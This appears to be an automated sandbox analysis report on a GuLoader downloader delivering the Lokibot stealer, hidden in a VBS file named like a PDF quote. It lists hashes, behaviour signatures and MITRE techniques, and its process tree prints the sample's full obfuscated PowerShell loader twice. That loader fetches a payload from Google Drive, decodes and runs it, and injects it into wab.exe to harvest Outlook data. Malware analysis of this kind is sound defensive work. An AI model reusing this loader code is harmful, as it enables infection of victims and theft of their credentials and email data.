guloader | 56b71885512e781975e310bc62af1a41bd731895d661f5cc49eff2a640806cd0

Analysis

max time kernel
147s
max time network
118s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
18-04-2024 19:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Request for Proposal Quote_2414976·pdf.vbs
Size

363KB
MD5

4c0d5b830080aa8b72546a6d7f924aca
SHA1

d061aa6f577e894eb58fd4bc64b366e2e7919630
SHA256

56b71885512e781975e310bc62af1a41bd731895d661f5cc49eff2a640806cd0
SHA512

c87b174d0e027f6f85be7669e16b1430531f7880d507ebd1cec55f159fb71bf3ede586001c8a32424886e74dc3477b09d1108c133f75441575cf2d6c896d7d7d
SSDEEP

6144:1qJLaVfs2VTA05zBWJKJqDv9WlmDg6bMiaNb3rczF9V4I5Btg/zRoFTC4vSUUkPE:4uInOi5cI5E0k

Score

10^/10

guloader lokibot collection downloader spyware stealer trojan

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Blocklisted process makes network request 3 IoCs

Processes:

WScript.exepowershell.exe

flow pid process

3 1948 WScript.exe
7 1640 powershell.exe
9 1640 powershell.exe

flow	pid	process
3	1948	WScript.exe
7	1640	powershell.exe
9	1640	powershell.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

wab.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wab.exe
Key opened	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	wab.exe
Key opened	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wab.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

6 drive.google.com
7 drive.google.com
11 drive.google.com
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

Processes:

wab.exe

pid process

2772 wab.exe
2772 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

1592 powershell.exe
2772 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1592 set thread context of 2772 1592 powershell.exe wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exe

pid process

1640 powershell.exe
1592 powershell.exe
1592 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

1592 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 1640 powershell.exe
Token: SeDebugPrivilege 1592 powershell.exe
Token: SeDebugPrivilege 2772 wab.exe

flow	ioc
6	drive.google.com
7	drive.google.com
11	drive.google.com

pid	process
2772	wab.exe
2772	wab.exe

pid	process
1592	powershell.exe
2772	wab.exe

description	pid	process	target process
PID 1592 set thread context of 2772	1592	powershell.exe	wab.exe

pid	process
1640	powershell.exe
1592	powershell.exe
1592	powershell.exe

pid	process
1592	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1640	powershell.exe
Token: SeDebugPrivilege	1592	powershell.exe
Token: SeDebugPrivilege	2772	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1948 wrote to memory of 1640	1948	WScript.exe	powershell.exe
PID 1948 wrote to memory of 1640	1948	WScript.exe	powershell.exe
PID 1948 wrote to memory of 1640	1948	WScript.exe	powershell.exe
PID 1640 wrote to memory of 2956	1640	powershell.exe	cmd.exe
PID 1640 wrote to memory of 2956	1640	powershell.exe	cmd.exe
PID 1640 wrote to memory of 2956	1640	powershell.exe	cmd.exe
PID 1640 wrote to memory of 1592	1640	powershell.exe	powershell.exe
PID 1640 wrote to memory of 1592	1640	powershell.exe	powershell.exe
PID 1640 wrote to memory of 1592	1640	powershell.exe	powershell.exe
PID 1640 wrote to memory of 1592	1640	powershell.exe	powershell.exe
PID 1592 wrote to memory of 2756	1592	powershell.exe	cmd.exe
PID 1592 wrote to memory of 2756	1592	powershell.exe	cmd.exe
PID 1592 wrote to memory of 2756	1592	powershell.exe	cmd.exe
PID 1592 wrote to memory of 2756	1592	powershell.exe	cmd.exe
PID 1592 wrote to memory of 2772	1592	powershell.exe	wab.exe
PID 1592 wrote to memory of 2772	1592	powershell.exe	wab.exe
PID 1592 wrote to memory of 2772	1592	powershell.exe	wab.exe
PID 1592 wrote to memory of 2772	1592	powershell.exe	wab.exe
PID 1592 wrote to memory of 2772	1592	powershell.exe	wab.exe
PID 1592 wrote to memory of 2772	1592	powershell.exe	wab.exe

outlook_office_path 1 IoCs

Processes:

wab.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wab.exe

outlook_win_path 1 IoCs

Processes:

wab.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request for Proposal Quote_2414976·pdf.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.AmusemesminespipQuadratlEarnneti Jdeka tclownis(Upaak.a$ AjlendmCalciumoOpmaalidIntraduuSengetilIndtraeadecenehr S.opkei.ribesyzTonika,aEksament LenderiReassuroP.imaqunGreffot)Kl mren ');$Cereals148=$nymaane[0];Medicinmands (Refrig213 'Oseulov$DiffundgSnebol l,elinquoStibblebPilliveaAcroatilTaarnet:SokratiNForsvoroCabbalanMiljf rfbikini,e SkuffevM toricebruttoar Scop.eiBradsotsRevolveh MillimlTalemaayCratere=Hild nsN Grot,seGrsrddewr ferat-SkidterOSpr,gfrbunreseajDescendeSpinalvcKnaphultOverbbo Ov rskrSDiumviryNrrebrosSekstantDrukkenehypotypmTu,imin.Pre,urlN He.seseBlokindtHelicot.Remo.teWAngili,ePeng.afbKnishesC Pr,dukl Koldsvi tdlisteOffervinFu dskgt Entomi ');Medicinmands (Refrig213 ' Falski$StipendNAzoturio fortilnStruktufSpind neCaterinvDaneworeStackfurSexivaliBouillasOver.rdhB khamrlSquarefyKastnin.KnallerHbotswaneBrandtra SumptedRentesreOmmastrrch,loposJe.loja[Skole.a$applikaUBewil,en ,ommatpDeployesVektoreyLimonencSupporthredubbeopreencllUnmundao iblerngMegalosiForeplecFr,findaOksehallH rnesolRivstyrytennise2Skrivek5Optning3ancien.]roxbury=Stillin$Ski shaSNring btMeantclyTabelopgOver kkgSemiquieBrudefrrEneboe eHrolfgrsBarotro ');$Baandkassette=Refrig213 'AfbdpreN ncoacto Bogstan oumaphfa.meldeeSlaa invBa,tardeSkranker FrigiviKorr lssMeldrjehSlaglerlWhirtleyvortigi.AfblomsDFixatesoFngslinwsequestnpet,eanlirritamoVasoconaScutelsdLashligFSnekas iBufferrlDyrerygeM.croca(Chayspa$SemigeoC Cla.ateBalsamerDistribe Rebs aaJonosfrlUnballasReeject1Opbevar4 Smi st8Ben.asu,Selvtnk$Blndf,iT,arasanrMiljkrai Palm.vl PaketpoSubobsogLaminatiKomm.nis Abetto)Trodsal ';$Baandkassette=$Gewgawy[1]+$Baandkassette;$Trilogis=$Gewgawy[0];Medicinmands (Refrig213 ' Reinoc$BumblergBouffanlPl ckagoLd.rskobShopp.da ForbrnlKontrap:MadopskdYoghurteDe,ivedaBidroggcOmmateuiFyndfordmillibaiMul,elsfHeltalsiAttempte SuperldHinckle= Yach,d(SkruefoTFictioneProsocosSelenittUstulat-Un,ecipPP,ruvataSmrb.omtKontrolhGironsi Frastd$PuttendTTuringbrForsikriSneendelSkamskdoSsterdagApplanaiTobakshsFremsta)Mesomer ');while (!$deacidified) {Medicinmands (Refrig213 'Stokesi$AiledprgSjussetlPolariso MotherbGlaucodaNeut.oplh rkslu: SelvflSForanaltPopulare ptimisrTomentaoT,inglyiLavended Bastiop.verswerAssortepMindsteaLocan.ar,nhalataA corditGearendeReattentAccisen6Eksalte4Skvadro=Fodbol,$For.magtNonrecorHydrolouG,fteneeMa.titi ') ;Medicinmands $Baandkassette;Medicinmands (Refrig213 'UdstraaSEvadeentTskesbia TidnderTusindttDharmas-AlanineS Ultraml Ingre e DiakoneReswo epBjninge Program4 Haybil ');Medicinmands (Refrig213 'Sei mom$UfyldesgSlagvarlAflsseroForce.eb Su.aryaFrigrellSpiritu:Krag.rudFloggereBoligbya UnderscI ochimi QuicksdfootbriiBasketlfTeleutoi Nimblee Abbre dprodukt=Unsigna(PendlinT stabileSemiempsGladelitSemiper-StaalrrPPoluphlaAntyd itB,dbillhBe.andl Myo,ipo$MalpropTTrtidgerStercoriUtriculldatatraoAuktiong Etat.aiVestliksB.devin)Sl fnin ') ;Medicinmands (Refrig213 'Turesso$Me cedigBl,ebrslFredsbeomisbehabbask,tfaSloshinl Njagti:Tr nsmuDCessat i SpangloUdlbsdapAngiocatAntickmr Gearine,revordsR jfnin= Arbej.$.ffidavgR,frygtlUnexpiroAfskridbkna penaVejr orl Aridne:CaddishbSpindlea Spe dexHorsetrtStereopePop.lrvrN.settriLi estia IntracnKommand+F genbl+Brinjau%Fu.lefn$ edfrennRealindyAngelicmhjttaleaIsdessea DisconnFlimf.aeGrundop.PhilosocOpbygnioUnderspuLandhusnRedigertTo.ases ') ;$Cereals148=$nymaane[$Dioptres];}Medicinmands (Refrig213 'Tin.oli$Nucleoag LoppetlJordemoo Leky.hb Tyend.aSpa.ierlQuak er:FeedwatJOssetisoDoktorasQuadrictConventsUd,ldes Skislab=Fourtee OligosaGPlumbice ogribctLu.ubra- FiancaC,marevooGraminanConceitt SupersepandiesnArgynnitOutslid Coa apr$BlyanttTTorrefirWhiz eriSoignrelKlienteo Parro,gTriumfaiBobtailsUnim.ro ');Medicinmands (Refrig213 'Skrubtu$dainvksg Termosls.aryvioLandbrubOverstraFalsummlBrobane:Salvedpa MastoikPanteglvCozenagaResusciv,emiappi TelesktNavi.sgt teamereCym.grarnatkjo. Fessqu.= epichi Whodno[D sspriS Indi ey VocalisPromi,etMcelroye T lskdm Ski.te.unemendCTrefagso OdontonHybelenvTo vtoneMowlandrres.nertCinclid]Merp is:Nause u: play rFTonsillrDem.repoRap,cclmS.mmenkBTilfredaBest.alsMervrdieNsedes 6 fskeds4AbulyeiSWantonntAstmatirImmeritiAnholdtnKn,fordg Mlk tn(Su,erse$ FnatteJMerglinoUltimatsGuttlertAbstinesPrebend)Autosig ');Medicinmands (Refrig213 'Tydelig$Hols.ergRuma,ialAfsesseoNondelib twankaawindballl conis:Gl cehaOKittledp P.stmot BacchaeatmolyzgTabulatnAkt,icee MistanlBal,iums TorbeneKofa.gesTe.rifibRemonstoPrimaltg Blu deeGarde.enTilflyt1Synkrot9 Bagved9Rakkere slg ern=Pa ness Plumrin[MandacaSDtesfugyTims visLangplatLise queNatug.em Masede.Carmel,TFiredeletudistrxPejsesftdigress.MiriamsEStjernenHomoplac EksameoPilothod BurrieiNonrecinLaplndegPu.zler]kommuna:Skovl,n:Jukebo,AForh niSDemonstCPagodalI WaxersI Fladbu.Unt,ranGFravrspeForblfft.maaoveSTraktertAastederAlditoli Leak,gnforhjengUppoura(Dimensi$UdrmmedaHavebrukFormalivS ippleaD.tabasvOpsamlei,ommemotBefrd.dt P,atewe WesterrHarcele)elifdir ');Medicinmands (Refrig213 'Bal,eum$SrbehangFleraarlPre.isloFore.adbAnkomstaOversavlUnderfr:F gomraPDrmm.slr presseo SvindlvRemarrii cateravSpeanini UdbudssConnivee,andatacTyre ektSetnmpsiDroslenoF tometnGulvene=Cy oseu$ Ark bcOCoraisep Reaffit Flacoueorp,nsugSubs.nonGstelree Retrotl PreobtsReagente FremkasArcticwb bakkeroPaatagegK,nomoceSjos,esnOverint1Isadelp9,ucosmi9repatr,.RetslgesmirkyvkuHensynsb RemindsGenvurdtRaa.slar DemoraiOpkalden ThingugSt ikeo( Pipunc3 Bager,2A,niell5Ve,stre3Duksety3 Galope2Pe,mica, Inter.3Semip.i0unoccid3 Semido6Regnest3Tilside)Thala o ');Medicinmands $Provivisection;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1640

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $"
3⤵
PID:2956

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.AmusemesminespipQuadratlEarnneti Jdeka tclownis(Upaak.a$ AjlendmCalciumoOpmaalidIntraduuSengetilIndtraeadecenehr S.opkei.ribesyzTonika,aEksament LenderiReassuroP.imaqunGreffot)Kl mren ');$Cereals148=$nymaane[0];Medicinmands (Refrig213 'Oseulov$DiffundgSnebol l,elinquoStibblebPilliveaAcroatilTaarnet:SokratiNForsvoroCabbalanMiljf rfbikini,e SkuffevM toricebruttoar Scop.eiBradsotsRevolveh MillimlTalemaayCratere=Hild nsN Grot,seGrsrddewr ferat-SkidterOSpr,gfrbunreseajDescendeSpinalvcKnaphultOverbbo Ov rskrSDiumviryNrrebrosSekstantDrukkenehypotypmTu,imin.Pre,urlN He.seseBlokindtHelicot.Remo.teWAngili,ePeng.afbKnishesC Pr,dukl Koldsvi tdlisteOffervinFu dskgt Entomi ');Medicinmands (Refrig213 ' Falski$StipendNAzoturio fortilnStruktufSpind neCaterinvDaneworeStackfurSexivaliBouillasOver.rdhB khamrlSquarefyKastnin.KnallerHbotswaneBrandtra SumptedRentesreOmmastrrch,loposJe.loja[Skole.a$applikaUBewil,en ,ommatpDeployesVektoreyLimonencSupporthredubbeopreencllUnmundao iblerngMegalosiForeplecFr,findaOksehallH rnesolRivstyrytennise2Skrivek5Optning3ancien.]roxbury=Stillin$Ski shaSNring btMeantclyTabelopgOver kkgSemiquieBrudefrrEneboe eHrolfgrsBarotro ');$Baandkassette=Refrig213 'AfbdpreN ncoacto Bogstan oumaphfa.meldeeSlaa invBa,tardeSkranker FrigiviKorr lssMeldrjehSlaglerlWhirtleyvortigi.AfblomsDFixatesoFngslinwsequestnpet,eanlirritamoVasoconaScutelsdLashligFSnekas iBufferrlDyrerygeM.croca(Chayspa$SemigeoC Cla.ateBalsamerDistribe Rebs aaJonosfrlUnballasReeject1Opbevar4 Smi st8Ben.asu,Selvtnk$Blndf,iT,arasanrMiljkrai Palm.vl PaketpoSubobsogLaminatiKomm.nis Abetto)Trodsal ';$Baandkassette=$Gewgawy[1]+$Baandkassette;$Trilogis=$Gewgawy[0];Medicinmands (Refrig213 ' Reinoc$BumblergBouffanlPl ckagoLd.rskobShopp.da ForbrnlKontrap:MadopskdYoghurteDe,ivedaBidroggcOmmateuiFyndfordmillibaiMul,elsfHeltalsiAttempte SuperldHinckle= Yach,d(SkruefoTFictioneProsocosSelenittUstulat-Un,ecipPP,ruvataSmrb.omtKontrolhGironsi Frastd$PuttendTTuringbrForsikriSneendelSkamskdoSsterdagApplanaiTobakshsFremsta)Mesomer ');while (!$deacidified) {Medicinmands (Refrig213 'Stokesi$AiledprgSjussetlPolariso MotherbGlaucodaNeut.oplh rkslu: SelvflSForanaltPopulare ptimisrTomentaoT,inglyiLavended Bastiop.verswerAssortepMindsteaLocan.ar,nhalataA corditGearendeReattentAccisen6Eksalte4Skvadro=Fodbol,$For.magtNonrecorHydrolouG,fteneeMa.titi ') ;Medicinmands $Baandkassette;Medicinmands (Refrig213 'UdstraaSEvadeentTskesbia TidnderTusindttDharmas-AlanineS Ultraml Ingre e DiakoneReswo epBjninge Program4 Haybil ');Medicinmands (Refrig213 'Sei mom$UfyldesgSlagvarlAflsseroForce.eb Su.aryaFrigrellSpiritu:Krag.rudFloggereBoligbya UnderscI ochimi QuicksdfootbriiBasketlfTeleutoi Nimblee Abbre dprodukt=Unsigna(PendlinT stabileSemiempsGladelitSemiper-StaalrrPPoluphlaAntyd itB,dbillhBe.andl Myo,ipo$MalpropTTrtidgerStercoriUtriculldatatraoAuktiong Etat.aiVestliksB.devin)Sl fnin ') ;Medicinmands (Refrig213 'Turesso$Me cedigBl,ebrslFredsbeomisbehabbask,tfaSloshinl Njagti:Tr nsmuDCessat i SpangloUdlbsdapAngiocatAntickmr Gearine,revordsR jfnin= Arbej.$.ffidavgR,frygtlUnexpiroAfskridbkna penaVejr orl Aridne:CaddishbSpindlea Spe dexHorsetrtStereopePop.lrvrN.settriLi estia IntracnKommand+F genbl+Brinjau%Fu.lefn$ edfrennRealindyAngelicmhjttaleaIsdessea DisconnFlimf.aeGrundop.PhilosocOpbygnioUnderspuLandhusnRedigertTo.ases ') ;$Cereals148=$nymaane[$Dioptres];}Medicinmands (Refrig213 'Tin.oli$Nucleoag LoppetlJordemoo Leky.hb Tyend.aSpa.ierlQuak er:FeedwatJOssetisoDoktorasQuadrictConventsUd,ldes Skislab=Fourtee OligosaGPlumbice ogribctLu.ubra- FiancaC,marevooGraminanConceitt SupersepandiesnArgynnitOutslid Coa apr$BlyanttTTorrefirWhiz eriSoignrelKlienteo Parro,gTriumfaiBobtailsUnim.ro ');Medicinmands (Refrig213 'Skrubtu$dainvksg Termosls.aryvioLandbrubOverstraFalsummlBrobane:Salvedpa MastoikPanteglvCozenagaResusciv,emiappi TelesktNavi.sgt teamereCym.grarnatkjo. Fessqu.= epichi Whodno[D sspriS Indi ey VocalisPromi,etMcelroye T lskdm Ski.te.unemendCTrefagso OdontonHybelenvTo vtoneMowlandrres.nertCinclid]Merp is:Nause u: play rFTonsillrDem.repoRap,cclmS.mmenkBTilfredaBest.alsMervrdieNsedes 6 fskeds4AbulyeiSWantonntAstmatirImmeritiAnholdtnKn,fordg Mlk tn(Su,erse$ FnatteJMerglinoUltimatsGuttlertAbstinesPrebend)Autosig ');Medicinmands (Refrig213 'Tydelig$Hols.ergRuma,ialAfsesseoNondelib twankaawindballl conis:Gl cehaOKittledp P.stmot BacchaeatmolyzgTabulatnAkt,icee MistanlBal,iums TorbeneKofa.gesTe.rifibRemonstoPrimaltg Blu deeGarde.enTilflyt1Synkrot9 Bagved9Rakkere slg ern=Pa ness Plumrin[MandacaSDtesfugyTims visLangplatLise queNatug.em Masede.Carmel,TFiredeletudistrxPejsesftdigress.MiriamsEStjernenHomoplac EksameoPilothod BurrieiNonrecinLaplndegPu.zler]kommuna:Skovl,n:Jukebo,AForh niSDemonstCPagodalI WaxersI Fladbu.Unt,ranGFravrspeForblfft.maaoveSTraktertAastederAlditoli Leak,gnforhjengUppoura(Dimensi$UdrmmedaHavebrukFormalivS ippleaD.tabasvOpsamlei,ommemotBefrd.dt P,atewe WesterrHarcele)elifdir ');Medicinmands (Refrig213 'Bal,eum$SrbehangFleraarlPre.isloFore.adbAnkomstaOversavlUnderfr:F gomraPDrmm.slr presseo SvindlvRemarrii cateravSpeanini UdbudssConnivee,andatacTyre ektSetnmpsiDroslenoF tometnGulvene=Cy oseu$ Ark bcOCoraisep Reaffit Flacoueorp,nsugSubs.nonGstelree Retrotl PreobtsReagente FremkasArcticwb bakkeroPaatagegK,nomoceSjos,esnOverint1Isadelp9,ucosmi9repatr,.RetslgesmirkyvkuHensynsb RemindsGenvurdtRaa.slar DemoraiOpkalden ThingugSt ikeo( Pipunc3 Bager,2A,niell5Ve,stre3Duksety3 Galope2Pe,mica, Inter.3Semip.i0unoccid3 Semido6Regnest3Tilside)Thala o ');Medicinmands $Provivisection;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1592

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $"
4⤵
PID:2756

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2772

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Email Collection

T1114

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
839428e849bbf7a3401bf4023d474a79

SHA1
49b69cbaf7ba5c2df88e539f36dc62e66dfd68e8

SHA256
fe2031ad3ab21ea0ba4f9345a46fa83367016b20644000f80516b0b0b18ce7b7

SHA512
